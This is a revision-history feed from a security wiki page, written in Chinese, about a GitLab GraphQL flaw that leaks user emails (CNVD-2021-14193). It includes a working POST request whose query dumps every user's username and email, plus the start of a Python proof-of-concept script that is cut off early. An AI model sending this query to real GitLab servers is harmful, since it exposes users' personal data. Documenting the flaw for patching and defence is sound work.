https://pwnwiki.com/index.php?action=history&feed=atom&title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193%2Fzh-cn
GitLab Graphql郵箱信息洩露漏洞 CNVD-2021-14193/zh-cn - Revision history
2026-04-05T19:59:22Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3730&oldid=prev
L0snight: Created page with "==参考=="
2021-05-31T02:22:01Z
<p>Created page with "==参考=="</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:22, 31 May 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l85" >Line 85:</td>
<td colspan="2" class="diff-lineno">Line 85:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang</del>=<del class="diffchange diffchange-inline">"chinese" dir</del>=<del class="diffchange diffchange-inline">"ltr" class</del>=<del class="diffchange diffchange-inline">"mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==<ins class="diffchange diffchange-inline">参考</ins>==</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>=<del class="diffchange diffchange-inline">=參考==</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://mp.weixin.qq.com/s/3cT8d9I7qru2tsURqUDusw</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://mp.weixin.qq.com/s/3cT8d9I7qru2tsURqUDusw</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://gitlab.com/gitlab-org/gitlab/-/issues/244275</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://gitlab.com/gitlab-org/gitlab/-/issues/244275</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3728:rev-3730 -->
</table>
L0snight
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3728&oldid=prev
L0snight: Created page with "成功返回数据,造成Gitlab的用户邮箱信息泄露。"
2021-05-31T02:21:49Z
<p>Created page with "成功返回数据,造成Gitlab的用户邮箱信息泄露。"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:21, 31 May 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l27" >Line 27:</td>
<td colspan="2" class="diff-lineno">Line 27:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">成功返回数据,造成Gitlab的用户邮箱信息泄露。</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">成功返回數據,造成 Gitlab的用戶郵箱信息洩露。</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3726:rev-3728 -->
</table>
L0snight
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3726&oldid=prev
L0snight: Created page with "完整数据包为:"
2021-05-31T02:21:27Z
<p>Created page with "完整数据包为:"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:21, 31 May 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l16" >Line 16:</td>
<td colspan="2" class="diff-lineno">Line 16:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>发包调用了<code>/api/graphql</code>接口发送数据</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>发包调用了<code>/api/graphql</code>接口发送数据</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">完整数据包为:</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">完整數據包為:</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>POST /api/graphql HTTP/1.1</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>POST /api/graphql HTTP/1.1</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3724:rev-3726 -->
</table>
L0snight
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3724&oldid=prev
L0snight: Created page with "发包调用了<code>/api/graphql</code>接口发送数据"
2021-05-31T02:21:11Z
<p>Created page with "发包调用了<code>/api/graphql</code>接口发送数据"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:21, 31 May 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l14" >Line 14:</td>
<td colspan="2" class="diff-lineno">Line 14:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>查看完报告后发现漏洞利用需要有账号用户名,在不知道的情况下无法取得邮箱,在Graphql官网查看得知可以通过另一个构造的语句一次性返回所有的用户名和邮箱</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>查看完报告后发现漏洞利用需要有账号用户名,在不知道的情况下无法取得邮箱,在Graphql官网查看得知可以通过另一个构造的语句一次性返回所有的用户名和邮箱</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">发包调用了</ins><code>/api/graphql</code><ins class="diffchange diffchange-inline">接口发送数据</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">發包調用了</del><code>/api/graphql</code><del class="diffchange diffchange-inline">接口發送數據</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><div lang="chinese" dir="ltr" class="mw-content-ltr"></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><div lang="chinese" dir="ltr" class="mw-content-ltr"></div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3723:rev-3724 -->
</table>
L0snight
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3723&oldid=prev
L0snight: Created page with "查看完报告后发现漏洞利用需要有账号用户名,在不知道的情况下无法取得邮箱,在Graphql官网查看得知可以通过另一个构造的语句一..."
2021-05-31T02:21:07Z
<p>Created page with "查看完报告后发现漏洞利用需要有账号用户名,在不知道的情况下无法取得邮箱,在Graphql官网查看得知可以通过另一个构造的语句一..."</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:21, 31 May 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l13" >Line 13:</td>
<td colspan="2" class="diff-lineno">Line 13:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Gitlab本身不允许获取账号邮箱信息,这里通过调用Graphql用户名查询造成了邮箱泄露漏洞</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Gitlab本身不允许获取账号邮箱信息,这里通过调用Graphql用户名查询造成了邮箱泄露漏洞</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">查看完报告后发现漏洞利用需要有账号用户名,在不知道的情况下无法取得邮箱,在Graphql官网查看得知可以通过另一个构造的语句一次性返回所有的用户名和邮箱</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">查看完報告後發現漏洞利用需要有賬號用戶名,在不知道的情況下無法獲取郵箱,在Graphql官網查看得知可以通過另一個構造的語句一次性返回所有的用戶名和郵箱</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><div lang="chinese" dir="ltr" class="mw-content-ltr"></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><div lang="chinese" dir="ltr" class="mw-content-ltr"></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>發包調用了<code>/api/graphql</code>接口發送數據</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>發包調用了<code>/api/graphql</code>接口發送數據</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3720:rev-3723 -->
</table>
L0snight
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3720&oldid=prev
L0snight: Created page with "Gitlab本身不允许获取账号邮箱信息,这里通过调用Graphql用户名查询造成了邮箱泄露漏洞"
2021-05-31T02:20:28Z
<p>Created page with "Gitlab本身不允许获取账号邮箱信息,这里通过调用Graphql用户名查询造成了邮箱泄露漏洞"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:20, 31 May 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l11" >Line 11:</td>
<td colspan="2" class="diff-lineno">Line 11:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">Gitlab本身不允许获取账号邮箱信息,这里通过调用Graphql用户名查询造成了邮箱泄露漏洞</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">Gitlab本身不允許獲取賬號郵箱信息,這里通過調用 Graphql 用戶名查詢造成了郵箱洩露漏洞</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><div lang="chinese" dir="ltr" class="mw-content-ltr"></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><div lang="chinese" dir="ltr" class="mw-content-ltr"></div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3718:rev-3720 -->
</table>
L0snight
https://pwnwiki.com/index.php?title=GitLab_Graphql%E9%83%B5%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E_CNVD-2021-14193/zh-cn&diff=3718&oldid=prev
L0snight: Created page with "==漏洞利用== 请求URL:"
2021-05-31T02:18:46Z
<p>Created page with "==漏洞利用== 请求URL:"</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==影响版本==<br />
<br />
GitLab 13.4 - 13.6.2<br />
<br />
==漏洞利用==<br />
请求URL:<br />
<pre><br />
http://xxx.xxx.xxx.xxx/-//graphql-explorer<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
Gitlab本身不允許獲取賬號郵箱信息,這里通過調用 Graphql 用戶名查詢造成了郵箱洩露漏洞<br />
</div><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
查看完報告後發現漏洞利用需要有賬號用戶名,在不知道的情況下無法獲取郵箱,在Graphql官網查看得知可以通過另一個構造的語句一次性返回所有的用戶名和郵箱<br />
</div><br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
發包調用了<code>/api/graphql</code>接口發送數據<br />
</div><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
完整數據包為:<br />
</div><br />
<pre><br />
POST /api/graphql HTTP/1.1<br />
Host: xxx.xxx.xxx.xxx<br />
Content-Length: 212<br />
Content-Type: application/json<br />
<br />
<br />
{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
成功返回數據,造成 Gitlab的用戶郵箱信息洩露。<br />
</div><br />
<br />
<br />
==POC==<br />
<pre><br />
import requests<br />
import sys<br />
import random<br />
import re<br />
import json<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
<br />
def title():<br />
print('+--------------WgpSec--Team----------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
